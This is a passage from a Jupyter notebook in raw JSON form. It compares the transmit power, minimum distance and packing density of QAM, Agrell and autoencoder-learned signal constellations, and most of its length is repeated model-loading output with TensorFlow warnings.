)\n\nqam_d_min = np.unique(cdist(qam_map,qam_map))[1]\nprint(\"d_min:\", qam_d_min )\n\nqam_en = qam_sym_pow / (qam_d_min**2)\nprint(\"En:\", qam_en)", "QAM Avg. Tx Power: 4.0\nd_min: 2.0\nEn: 1.0\n" ] ], [ [ "Agrell", "_____no_output_____" ] ], [ [ "agrell_sym_pow = np.mean(np.sum(agrell_map*agrell_map,axis=1))\nprint( \"Agrell Avg. Tx Power:\", agrell_sym_pow )\n\nagrell_dmin = np.unique(cdist(agrell_map,agrell_map))[1]\nprint(\"d_min:\", agrell_dmin )\n\nagrell_en = agrell_sym_pow / (agrell_dmin**2)\nprint(\"En:\", agrell_en)", "Agrell Avg. Tx Power: 3.095200273238941\nd_min: 1.9999999999999998\nEn: 0.7738000683097355\n" ] ], [ [ "## Deep Learning Model", "_____no_output_____" ] ], [ [ "from CommVAE import CommVAE1hot\nfrom AEOshea import AEOshea1hot", "_____no_output_____" ] ], [ [ "Specify models to analyze", "_____no_output_____" ] ], [ [ "model_summary = {}\nresults = {}\n\n# if blkSize==8 and chDim==4:\n# model_summary = { \n# \"AWGN ($\\sigma_n^2=0.4$)\": \"./models_08x04/rbf_awgn_64_32_16_n040_summary.dil\",\n# \"AWGN ($\\sigma_n^2=0.8$)\": \"./models_08x04/rbf_awgn_64_32_16_n080_summary.dil\",\n# \"AWGN ($\\sigma_n^2=1.2$)\": \"./models_08x04/rbf_awgn_64_32_16_n120_summary.dil\",\n# \"RBF ($\\sigma_n^2=0.4$)\": \"./models_08x04/rbf_rbf_64_32_16_n040_summary.dil\",\n# \"RBF ($\\sigma_n^2=0.8$)\": \"./models_08x04/rbf_rbf_64_32_16_n080_summary.dil\",\n# \"RBF ($\\sigma_n^2=1.2$)\": \"./models_08x04/rbf_rbf_64_32_16_n120_summary.dil\",\n# \"Oshea ($4dB$)\": \"./models_08x04/rbf_oshea_64_32_16_04dB_summary.dil\",\n# \"Oshea ($10dB$)\": \"./models_08x04/rbf_oshea_64_32_16_10dB_summary.dil\"\n# }\n# elif blkSize==4 and chDim==2:\n# model_summary = {\n# \"AWGN($\\sigma_n^2=0.2$)\": \"./models_04x02/rbf_awgn_64_32_16_n020_summary.dil\",\n# \"AWGN($\\sigma_n^2=0.4$)\": \"./models_04x02/rbf_awgn_64_32_16_n040_summary.dil\",\n# \"AWGN($\\sigma_n^2=0.6$)\": \"./models_04x02/rbf_awgn_64_32_16_n060_summary.dil\",\n# \"RBF($\\sigma_n^2=0.2$)\": \"./models_04x02/rbf_rbf_64_32_16_n020_summary.dil\",\n# \"RBF($\\sigma_n^2=0.4$)\": \"./models_04x02/rbf_rbf_64_32_16_n040_summary.dil\",\n# \"RBF($\\sigma_n^2=0.6$)\": \"./models_04x02/rbf_rbf_64_32_16_n060_summary.dil\",\n# \"Oshea ($4dB$)\": \"./models_04x02/rbf_oshea_64_32_16_04dB_summary.dil\",\n# \"Oshea ($10dB$)\": \"./models_04x02/rbf_oshea_64_32_16_10dB_summary.dil\"\n# }\n# elif blkSize==2 and chDim==1:\n# model_summary = {\n \n# }\n# else:\n# raise NotImplementedError(\"Not implemented (blkSize={},chDim={})\".format(blkSize,chDim))\n\nif blkSize==8 and chDim==4:\n model_summary = { \n \"[1]\": \"./models_08x04/rbf_oshea_64_32_16_10dB_summary.dil\",\n# \"AWGN ($\\sigma_n^2=0.4$)\": \"./models_08x04/rbf_awgn_64_32_16_n040_summary.dil\",\n \"Proposed: Trained with (19)\": \"./models_08x04/rbf_awgn_64_32_16_n080_summary.dil\",\n# \"AWGN ($\\sigma_n^2=1.2$)\": \"./models_08x04/rbf_awgn_64_32_16_n120_summary.dil\",\n# \"RBF ($\\sigma_n^2=0.4$)\": \"./models_08x04/rbf_rbf_64_32_16_n040_summary.dil\",\n \"Proposed: Trained with (23)\": \"./models_08x04/rbf_rbf_64_32_16_n080_summary.dil\",\n# \"RBF ($\\sigma_n^2=1.2$)\": \"./models_08x04/rbf_rbf_64_32_16_n120_summary.dil\",\n# \"Oshea ($4dB$)\": \"./models_08x04/rbf_oshea_64_32_16_04dB_summary.dil\",\n }\nelif blkSize==4 and chDim==2:\n model_summary = {\n \"[1]\": \"./models_04x02/rbf_oshea_64_32_16_10dB_summary.dil\",\n# \"AWGN($\\sigma_n^2=0.2$)\": \"./models_04x02/rbf_awgn_64_32_16_n020_summary.dil\",\n \"Proposed: Trained with (19)\": \"./models_04x02/rbf_awgn_64_32_16_n040_summary.dil\",\n# \"AWGN($\\sigma_n^2=0.6$)\": \"./models_04x02/rbf_awgn_64_32_16_n060_summary.dil\",\n# \"RBF($\\sigma_n^2=0.2$)\": \"./models_04x02/rbf_rbf_64_32_16_n020_summary.dil\",\n \"Proposed: Trained with (23)\": \"./models_04x02/rbf_rbf_64_32_16_n040_summary.dil\",\n# \"RBF($\\sigma_n^2=0.6$)\": \"./models_04x02/rbf_rbf_64_32_16_n060_summary.dil\",\n# \"Oshea ($4dB$)\": \"./models_04x02/rbf_oshea_64_32_16_04dB_summary.dil\",\n }\nelif blkSize==2 and chDim==1:\n model_summary = {\n \"[1]\": \"./models_02x01/rbf_oshea_64_32_16_10dB_summary.dil\",\n \"Proposed: Trained with (19)\": \"./models_02x01/rbf_awgn_64_32_16_n020_summary.dil\",\n \"Proposed: Trained with (23)\": \"./models_02x01/rbf_rbf_64_32_16_n020_summary.dil\",\n }\nelse:\n raise NotImplementedError(\"Not implemented (blkSize={},chDim={})\".format(blkSize,chDim))", "_____no_output_____" ] ], [ [ "For each of the model, compute $E_n$", "_____no_output_____" ] ], [ [ "for (model_exp,summary_file) in model_summary.items():\n summary_data = {}\n file_prefix = None\n # Load file\n results[model_exp] = {}\n with open(summary_file, \"rb\") as file:\n file_prefix = summary_file.split(\"_summary.dil\")[0]\n summary_data = dill.load(file)\n for (modelid,(sym_pow,bler)) in summary_data.items():\n config_file = file_prefix + \"_\" + modelid + \".dil\"\n config = {}\n model = None\n with open(config_file, \"rb\") as cfg_file:\n config = dill.load(cfg_file)\n if 'obj_fn' in config: # obj_fn is there only for proposed CommVAE\n print(config_file, \" CommVAE\")\n model = CommVAE1hot()\n else:\n print(config_file, \" AEOshea\")\n model = AEOshea1hot()\n model.load_model(file_prefix+\"_\"+modelid)\n # Compute the Tx power and packing density\n dl_map = model.encode(one_hot_code)\n dl_sym_pow = np.mean(np.sum(dl_map*dl_map,axis=1))\n dl_d_min = np.unique(cdist(dl_map,dl_map))[1]\n dl_en = dl_sym_pow / (dl_d_min**2)\n print(\"sym_pow:\", sym_pow, \" Model: \", dl_sym_pow, dl_d_min, dl_en, \" Pilots :\", model.pilot_sym)\n assert(np.abs(sym_pow-dl_sym_pow)<1e-3) # To make sure that we loaded right weights to model\n # save the results\n results[model_exp][modelid] = dl_en\n # Clear Session and Model\n K.clear_session()\n del model", "./models_04x02/rbf_oshea_64_32_16_10dB_20190321021005.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0103226 Model: 4.0103226 1.8678458098603916 1.1494689954849178 Pilots : [1.00128949 1.00128949]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321021421.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.021494 Model: 4.021494 1.8041060599938958 1.2355584207892663 Pilots : [1.00268314 1.00268314]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321021835.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.016215 Model: 4.016215 1.8169302776635188 1.2165792730256213 Pilots : [1.00202481 1.00202481]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321022254.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0436974 Model: 4.0436974 1.8158547090988673 1.2263556913828362 Pilots : [1.00544733 1.00544733]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321022708.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.037722 Model: 4.037722 1.8163475654818217 1.2238790867622538 Pilots : [1.0047042 1.0047042]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321023126.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0043936 Model: 4.0043936 1.6767967212559638 1.4242162083206868 Pilots : [1.00054905 1.00054905]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321023536.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.022528 Model: 4.022528 1.8179753991717387 1.2170911100196704 Pilots : [1.00281207 1.00281207]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321023958.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.998302 Model: 3.998302 1.8599051654851653 1.155830076106752 Pilots : [0.99978773 0.99978773]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321024417.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0069776 Model: 4.0069776 1.8187605234264208 1.2113394792581473 Pilots : [1.00087181 1.00087181]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321024836.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025809 Model: 4.025809 1.8577280624361094 1.1665110660072782 Pilots : [1.00322091 1.00322091]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321025251.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0178227 Model: 4.0178227 1.7773294244121154 1.271905692306294 Pilots : [1.00222537 1.00222537]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321025709.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0080333 Model: 4.0080333 1.8589615323771391 1.15981978382771 Pilots : [1.00100366 1.00100366]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321030125.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0354357 Model: 4.0354357 1.802239819623082 1.2424109409253115 Pilots : [1.00441969 1.00441969]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321030542.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.013639 Model: 4.013639 1.7452961312609632 1.3176499598379294 Pilots : [1.00170342 1.00170342]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321030959.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0059853 Model: 4.0059853 1.7897968431852231 1.250552335088266 Pilots : [1.00074788 1.00074788]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321031413.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0025835 Model: 4.0025835 1.8177553921258718 1.2113496494030294 Pilots : [1.00032289 1.00032289]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321031827.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025197 Model: 4.025197 1.8098278952652804 1.228888804969346 Pilots : [1.00314468 1.00314468]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321032241.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.015998 Model: 4.015998 1.8424927124334518 1.1829923005113445 Pilots : [1.00199774 1.00199774]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321032658.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0335927 Model: 4.0335927 1.837315018256809 1.19488137716802 Pilots : [1.00419031 1.00419031]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321033123.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0236454 Model: 4.0236454 1.8817750977909322 1.1362771302777601 Pilots : [1.00295132 1.00295132]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321033550.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025368 Model: 4.025368 1.8257097577806654 1.2076529301285024 Pilots : [1.00316601 1.00316601]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321034014.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.015984 Model: 4.015984 1.8485696821243314 1.1752231239952582 Pilots : [1.00199602 1.00199602]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321034434.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0286736 Model: 4.0286736 1.8802292633889484 1.1395685961491018 Pilots : [1.00357781 1.00357781]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321034852.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.016572 Model: 4.016572 1.8505565310519945 1.172872606933723 Pilots : [1.00206936 1.00206936]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321035311.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.029778 Model: 4.029778 1.79253540488781 1.254138896146422 Pilots : [1.00371535 1.00371535]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321035725.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0006537 Model: 4.0006537 1.8324186104585374 1.1914657895805842 Pilots : [1.00008171 1.00008171]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321040145.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.017698 Model: 4.017698 1.8131303019091949 1.2221351532092075 Pilots : [1.00220978 1.00220978]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321040617.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0152607 Model: 4.0152607 1.7981845895769277 1.241781555338424 Pilots : [1.00190577 1.00190577]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321041055.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.024841 Model: 4.024841 1.7967098197282765 1.2467886137013293 Pilots : [1.0031003 1.0031003]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321041522.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0088215 Model: 4.0088215 1.9041017330576435 1.1056977375281305 Pilots : [1.00110208 1.00110208]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321041952.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0130568 Model: 4.0130568 1.9137692211982515 1.0957113758453254 Pilots : [1.00163076 1.00163076]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321042414.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0274296 Model: 4.0274296 1.8808260051124779 1.1384939149969364 Pilots : [1.00342284 1.00342284]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321042834.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.037004 Model: 4.037004 1.826254666912332 1.2104211442277624 Pilots : [1.00461485 1.00461485]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321043255.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.015849 Model: 4.015849 1.8623728783847342 1.1578281652405333 Pilots : [1.00197918 1.00197918]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321043723.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.017791 Model: 4.017791 1.8336122551154663 1.1950121296036216 Pilots : [1.00222138 1.00222138]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321044153.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0191555 Model: 4.0191555 1.8771560283731916 1.1406018312857202 Pilots : [1.00239158 1.00239158]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321044620.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0150876 Model: 4.0150876 1.8484147566522977 1.175157756644391 Pilots : [1.00188418 1.00188418]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321045059.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.010682 Model: 4.010682 1.860494457729058 1.1586745799219327 Pilots : [1.00133437 1.00133437]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321045520.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.03608 Model: 4.03608 1.872790937647868 1.1507504543597944 Pilots : [1.00449986 1.00449986]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321045959.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0150013 Model: 4.0150013 1.8476675980271335 1.1760830864806404 Pilots : [1.00187341 1.00187341]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321050428.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.004919 Model: 4.004919 1.8287811030791414 1.1974855776634943 Pilots : [1.00061469 1.00061469]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321050857.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.028403 Model: 4.028403 1.819831677687323 1.216383299318762 Pilots : [1.00354407 1.00354407]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321051319.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.9969583 Model: 3.9969583 1.7860125628941141 1.253027474606826 Pilots : [0.99961971 0.99961971]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321051744.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0231276 Model: 4.0231276 1.8803013977731322 1.1379124905911964 Pilots : [1.00288678 1.00288678]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321052207.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0188003 Model: 4.0188003 1.8711587175777078 1.147823645141683 Pilots : [1.00234728 1.00234728]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321052629.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0165615 Model: 4.0165615 1.8674855440391889 1.151701479157991 Pilots : [1.00206805 1.00206805]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321053053.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0150166 Model: 4.0150166 1.8604124477032609 1.1600290552495218 Pilots : [1.00187531 1.00187531]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321053514.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0086045 Model: 4.0086045 1.8443813119354509 1.178397429051123 Pilots : [1.00107499 1.00107499]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321053939.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0225 Model: 4.0225 1.8103210577984237 1.2273964151394758 Pilots : [1.00280856 1.00280856]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321054404.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.035507 Model: 4.035507 1.8886372298065395 1.1313605571663794 Pilots : [1.00442859 1.00442859]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321054824.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0148287 Model: 4.0148287 1.8202446368644765 1.2117345689606214 Pilots : [1.00185187 1.00185187]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321055244.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.9943185 Model: 3.9943185 1.8545530872059357 1.161352745218874 Pilots : [0.99928956 0.99928956]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321055711.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0013404 Model: 4.0013404 1.8845215850248629 1.1266869538290092 Pilots : [1.00016753 1.00016753]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321060131.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.015752 Model: 4.015752 1.7959352808969267 1.245046301435316 Pilots : [1.00196705 1.00196705]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321060550.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0269036 Model: 4.0269036 1.8081817708498318 1.2316492965078727 Pilots : [1.00335732 1.00335732]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321061018.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.023539 Model: 4.023539 1.8419103497359022 1.1859632895438887 Pilots : [1.00293807 1.00293807]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321061447.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.010163 Model: 4.010163 1.8275770029784644 1.2006340012787091 Pilots : [1.00126955 1.00126955]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321061915.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.03127 Model: 4.03127 1.883422630089833 1.1364395012494908 Pilots : [1.00390114 1.00390114]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321062344.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.013646 Model: 4.013646 1.8087448134324575 1.2268302658897514 Pilots : [1.00170431 1.00170431]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321062800.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0307713 Model: 4.0307713 1.8422339010589177 1.1876777291802805 Pilots : [1.00383904 1.00383904]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321063223.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.020724 Model: 4.020724 1.861862196416091 1.1598696238739292 Pilots : [1.00258713 1.00258713]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321063657.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0244484 Model: 4.0244484 1.840581079387669 1.187945334489249 Pilots : [1.00305139 1.00305139]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321064118.dil 